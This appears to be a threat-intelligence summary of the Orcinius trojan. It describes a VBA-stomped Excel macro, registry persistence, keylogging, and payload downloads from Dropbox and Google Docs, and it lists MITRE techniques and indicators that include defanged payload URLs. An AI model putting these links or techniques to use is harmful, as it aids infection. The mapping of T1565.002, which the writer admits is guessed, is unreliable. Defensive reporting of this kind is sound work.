Orcinus is a multi-stage Trojan that leverages Dropbox and Google Docs to fetch second-stage payloads while using an obfuscated VBA macro to stay under the radar, including persistence via registry keys and keyboard/window monitoring. The infection starts with an Excel file CALENDARIO AZZORTI.xls, uses VBA stomping to hide malicious code, and performs actions like registry tweaks, window enumeration, URL downloads, and keystroke capture to enable ongoing control. #Orcinius #Remcos #AgentTesla #Neshta #HTMLDropper #Synaptics
Keypoints
- The Orcinius sample is a multi-stage Trojan that uses Dropbox and Google Docs to download second-stage payloads and stay updated.
- The macro inside the document is obfuscated via a technique called “VBA stomping,” which destroys the original source and leaves only compiled p-code—the macro may show as nothing or harmless code when opened.
- The initial infection method is an Excel spreadsheet named CALENDARIO AZZORTI.xls.
- On execution, the malware checks and modifies registry keys to hide warnings and establish persistence (e.g., in startup items).
- It enumerates running Windows (EnumThreadWindows) and sets up a hook to monitor keyboard input (SetWindowsHookEx) to capture keystrokes.
- It downloads payloads from encoded URLs using WScript.Shell and uses randomized timers to control activation and download attempts, with several URL references tied to well-known payload families.
MITRE Techniques
- [T1059.005] Visual Basic – The macro within the Excel file is used to run malicious functionality; ‘VBA macro that has been modified with a technique called ‘VBA stomping’, where the original source code is destroyed, leaving only compiled p-code.’
- [T1027] Obfuscated/Compressed Files and Information – The VBA macro is obfuscated via “VBA stomping,” making the visible code inert until runtime.
- [T1112] Modify Registry – The sample checks registry keys and writes a new key to hide warnings.
- [T1547.001] Registry Run Keys/Startup Folder – Persistence is established by writing a key to HKEY_CURRENT_USERSoftwareMicrosoftOffice14.0ExcelResiliencyStartupItems.
- [T1105] Ingress Tool Transfer – It reaches out to encoded URLs and attempts to download payloads via WScript.Shell.
- [T1056.001] Keylogging – It uses SetWindowsHookEx to monitor keyboard input.
- [T1565.002] Signed Binary Proxy Execution: Autoruns? (Not explicitly named in article) – The sample relies on system hooks and startup items to achieve persistence and execution; quote: ‘Set up persistence by writing a key to HKEY_CURRENT_USERSoftwareMicrosoftOffice14.0ExcelResiliencyStartupItems’
Indicators of Compromise
- [Hash] SHA-256 – 28dd92363338b539aeec00df283e20666ad1bdee90d78c6376f615a0b9481f97 – Primary IOC provided by SonicWall.
- [URL] Dropbox-related domains – www-env.dropbox-dns[.]com – DNS/hosting domain used in the dropbox-related infrastructure.
- [URL] Google Docs download – hxxps://docs.google[.]com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download – Download URL referenced by the sample.
- [URL] Dropbox payload – hxxps://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 – Download link associated with the sample.
- [File] CALENDARIO AZZORTI.xls – Initial infection file used to drop the macro.
Read more: https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/